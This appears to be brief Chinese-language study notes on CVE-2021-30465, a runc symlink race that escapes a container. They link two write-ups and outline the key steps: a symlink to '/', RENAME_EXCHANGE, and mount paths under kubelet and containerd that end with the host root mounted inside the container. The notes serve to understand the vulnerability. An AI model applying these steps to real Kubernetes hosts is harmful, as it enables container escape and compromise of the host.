https://whip1ash.cn/2021/08/23/CVE-2021-30465/
https://blog.champtar.fr/runc-symlink-CVE-2021-30465/ 这里漏洞的重点是RENAME_EXCHANGE 和 /test2/test2。
ln -s / /test2/test2
mount(/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test2, /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/)
这个时候,/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test2就是软链接指向"/"。
再执行
mount(/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test2, /run/containerd/io.containerd.runtime.v2.task/k8s.io/SOMERANDOMID/rootfs/test1/zzz)
就把host的根目录,mount到容器内的/test1/zzz